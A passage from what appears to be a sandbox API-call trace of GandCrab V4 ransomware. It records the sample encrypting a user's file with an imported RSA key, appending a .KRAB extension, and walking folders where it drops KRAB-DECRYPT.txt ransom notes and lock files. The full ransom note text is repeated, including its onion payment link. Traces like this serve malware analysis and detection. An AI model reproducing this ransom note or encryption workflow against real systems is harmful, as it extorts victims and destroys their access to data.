hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0093.141] GetLastError () returned 0x0 [0093.141] CryptDestroyKey (hKey=0xfbd560) returned 1 [0093.141] CryptReleaseContext (hProv=0x10112c0, dwFlags=0x0) returned 1 [0093.141] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1011898) returned 1 [0093.141] CryptImportKey (in: hProv=0x1011898, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd3e0) returned 1 [0093.141] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0093.141] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0093.143] GetLastError () returned 0x0 [0093.143] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0093.143] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0093.143] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\-c6vpX_SqZGq97r z.m4a" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\-c6vpx_sqzgq97r z.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0093.144] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0093.145] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0093.145] ReadFile (in: hFile=0x434, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0x48ff, lpOverlapped=0x0) returned 1 [0093.160] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffffb701, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.160] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x48ff, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0x48ff, lpOverlapped=0x0) returned 1 [0093.160] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) returned 1 [0093.160] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.174] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.174] CloseHandle (hObject=0x434) returned 1 [0093.174] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.175] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\-c6vpX_SqZGq97r z.m4a" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\-c6vpx_sqzgq97r z.m4a"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\-c6vpX_SqZGq97r z.m4a.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\-c6vpx_sqzgq97r z.m4a.krab")) returned 1 [0093.178] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.179] FindNextFileW (in: hFindFile=0xfbd5a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0093.179] lstrcmpW (lpString1="9FGr28gE", lpString2=".") returned 1 [0093.179] lstrcmpW (lpString1="9FGr28gE", lpString2="..") returned 1 [0093.179] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\", lpString2="9FGr28gE" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE" [0093.179] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\" [0093.179] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0093.179] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0093.180] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0093.180] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0093.180] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0093.180] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.180] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0093.180] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\\\KRAB-DECRYPT.txt") returned 54 [0093.180] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0093.182] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0093.182] WriteFile (in: hFile=0x434, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338efa0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338efa0*=0x1f6e, lpOverlapped=0x0) returned 1 [0093.183] CloseHandle (hObject=0x434) returned 1 [0093.183] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.184] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0093.184] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x28, wMilliseconds=0x181)) [0093.184] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0093.184] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0093.184] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0093.186] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\d2ca4a08d2ca4dee3d.lock") returned 60 [0093.186] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x434 [0093.189] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.189] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.189] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\") returned 37 [0093.189] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\*" [0093.189] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\*", lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 0xfbd3e0 [0093.190] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.190] FindNextFileW (in: hFindFile=0xfbd3e0, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0093.190] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.190] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.190] FindNextFileW (in: hFindFile=0xfbd3e0, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0093.190] lstrcmpW (lpString1="7tTH3KwoEqko2i", lpString2=".") returned 1 [0093.190] lstrcmpW (lpString1="7tTH3KwoEqko2i", lpString2="..") returned 1 [0093.190] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\", lpString2="7tTH3KwoEqko2i" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i" [0093.190] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\" [0093.190] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0093.190] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0093.190] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0093.190] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0093.190] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0093.191] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.191] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0093.191] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\\\KRAB-DECRYPT.txt") returned 69 [0093.191] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\7tth3kwoeqko2i\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0093.244] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\nlAQAAHPTUHGrjb/dcqUrzDS2xomeC8P4CUSPNAOL+0Mo/RbLr0OaWU1FJb00XfFHXj6tOuf3fPEItNktL2VhtINGOMGKEAUgRHIwxSGaKwcSkEjDUL0HUwplREArY2eQK/2FlKmtVxY2cgAjLoWFXtwo2gEK4a1eyVpOdA/5PKA19vmu9D7IWlFZ8M2v2HcmX1WFwMSKKyCPyE3I12HtIyga2yppmGj/0kbeo4Pyss0DfwD9qQhlmbNwHCOobnSofdvP3cINJt0T+mj6E/gguxJb77VutzLS7ATQylX2An2d2MzGDkSiNzUWV0yDTYzmL5WDSsSyVbWoOteqpx5W43Cfpby5H7iD4Mk5vDzBWPVFeBH4GhKSNudNQl6iOb1l4eeUMuEBXGw0+BpkUrUAgQjBWLbJ6CleUr6MmODOH6A7Jhf60sNPZMijoWaqeecabt0KEf7vwtAKjxeXkDnboIObW61GiYye3Y4Tx1l6X4ZFSnOs4j5jePpy6IWD50Buvy4RFZAKh09rDrTVp5PPV5K0wx5ROUVxEFDMbKemGWn2kbJiiMXWKf9il9ecR7Vj6B9X2QxCxUUzPoOCetcS51SFmTzpNC24BpHiYhlhwBirS7mEqg9eHAs2+76DlthH0IYBlLrEZfZyF2GmyxnNSuiRvf66muc7RQYfG3jxGAECcWKNLqKv8fvy6Z8TXe6Wy3TAJ9Bs4xTAPNS0SMF465Ku6H3cEM/+Sga6KajwZhU3AgixnVgyRE321c0dFCBWzWXYlI72JWaaZIHuktcbpqOdgIM0s1zRRiik4jAuC9jbkuK4dcgArE7p/ZEF5efpIhovrn/JleylI8aSPNqecB9NGmRzRYsl1yx7R79uHvMfZXs9u6R7v6sJyePFcv2fFnDq/8LyXgfBE9ECjLuiUlSkGewajMUrZ37SpbSW8OrKVHO/wBgi22J5C1kUjTYx7CQfDqZArf9qjhD5TjMiNMJUTOcANT1k8LdJCX5YnEkqbql9zAKGPD3h85JtJy5d5qZmc1qVDvNq4JgortqMJN+wJ1cbi0dC0ZupdUMXdEyil5EVrOYjd7OcK256OyLJexaPYNoLMT7nNQFQdBAdgxrP1A2j17iR9Rncy0lG27vyzvnlxBJHtN4rzwPyJcWjijdp+tPdfwpkuUhL1s780j4MPPa6ZSqrbN1dVzXyLYpgTfUJlmuliMYsyPoNF0wncUp6xOYOyeuFYcAYzh6kio0hS/OQfq9DULy4jlRsz4upLH/t6I4C2/8Dhtc9am+2z9kXRqxFGT2X4svMmQoZzcM7WuEljG+iZFnGvqeC8n5vHYUfpc5fDXIAr/3POwA8reJF9MuTQQ1Y71BT3fv8E7sTer0XVOuLq5R4mK7sEM2n3/s8Xg1stfLsHdFcp4Hmv7zJXtlAL+R4H9W/nSZPojs1+CA3f3LfcV0a7HpDCnE+3xAWSnFQ2gRJqfwbzuEDyyCVnlyuJ3gtkbgNzq9B1APP/reqFbD0NTG+Qbvjfy1WKWsuD6289ARnmzQdZfMJBKc6RFzabP8o+FTdQ528K5/LT7x00/WeKSnwRm9OwlEw+VgWABWgavtON3e6mnQGl0Ht3WD/SoiTiUQhaoEEUIhq2bMJGacz0QBGGZmiesqKc5BNYY47mlOBt90VgLBU4CrLlcekD1QKjwWIv7VZ/6d9hWbB8r/E0K0I3RLvsz5vWO2nXOYF4tjdvIFwTL7vhZLqD68CF4elxti9nkRp6gejjvBin0GKFE4sn+7ygICF6nm51nbjx2PCS9UqKQVB18bAq1wqNncQG3eriEdZiQnDmTTBJwZ6wxpzlzgiHPxH2MQl59eCy06ZlQ4pRy8AIZxYSs8MjywVkVMf5xfLKSSVC62MPhaeUAB6K7uhE53Kh/oFl2ty6x3FceOAGIk+6qZNV46mVnA0GY1UlOP7S+iVlY0LkPprvD5AwUQwkDA3J2EcOBy5zS0VDHF/IytPJedv/7il5EehJa3AjJJxYGvWERQaYZIUHY/zL8TGo2R8/ZR5MxJqHNldb8Qd8e6doJuxjxiJYrhGVvyhtJA622V6kMSz5u9Zt2BKOap2t+iec6qvzJ66awl54zVCYGCWnYUJ0Gr+HJQiCb+f9SsuUKy0pCXHEtL7hiZI7EOOMD7fkCREB/rydvt9VVgNLaxwvILFzP8c8FdqundPbfSwa3uorXdvHPZwzmxgXTCDqSdOEPl1K4/SIPmI5XHa0B26K6PumAdOtmc=\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0093.244] WriteFile (in: hFile=0x3a8, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338ed20, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338ed20*=0x1f6e, lpOverlapped=0x0) returned 1 [0093.246] CloseHandle (hObject=0x3a8) returned 1 [0093.246] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.246] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0093.246] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x28, wMilliseconds=0x1c0)) [0093.246] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0093.247] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0093.247] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0093.247] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\d2ca4a08d2ca4dee3d.lock") returned 75 [0093.247] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\7tth3kwoeqko2i\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3a8 [0093.248] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.248] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.248] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\") returned 52 [0093.248] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\*" [0093.248] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\*", lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 0xfbd560 [0093.248] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.249] FindNextFileW (in: hFindFile=0xfbd560, 